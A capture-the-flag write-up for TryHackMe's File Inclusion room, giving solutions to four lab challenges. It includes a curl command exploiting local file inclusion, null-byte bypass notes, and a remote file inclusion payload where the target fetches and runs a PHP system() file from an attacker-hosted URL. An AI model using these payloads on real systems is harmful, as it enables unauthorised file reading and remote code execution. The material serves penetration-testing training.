THM — File Inclusion WriteUp
The File Inclusion room on TryHackMe teaches you file inclusion vulnerabilities. It is part of Junior Penetration Tester path under the Introduction to Web Hacking category. This WriteUp contains solutions for the 4 challenges at the end of the room.
Challenge 1
The POST parameter “file” is vulnerable to LFI. It is possible to retrieve the flag with the following command:
curl http://10.10.179.245/challenges/chall1.php -X POST -d "file=/etc/flag1"
Challenge 2
The THM Cookie Parameter is vulnerable to LFI. It is mandatory that the word “Admin” is inside the Cookie Parameter, but the user input gets not filtered. The string “.php” gets added to the input, hence “%00” is mandatory to include the flag:
Challenge 3
Changing the request type to POST, the file parameters gets vulnerable to LFI. It is also important to end the file parameter with null (%00). With the following request you can retrieve flag 3:
Challenge 4
The file parameter at /playground.php is vulnerable to remote file inclusion. With this vulnerability it is possible to execute arbitrary commands. A file called “cmd” with following contents have been hosted on the attacker machine:
<?PHP system("hostname"); ?>The file could be retrieve via the following URL:
http://<attacker_ip>:4444/cmdAfter calling the following URL via a GET request it was possible to run PHP code:
http://10.10.179.245/playground.php?file=http://<attacker_ip>:4444/cmd
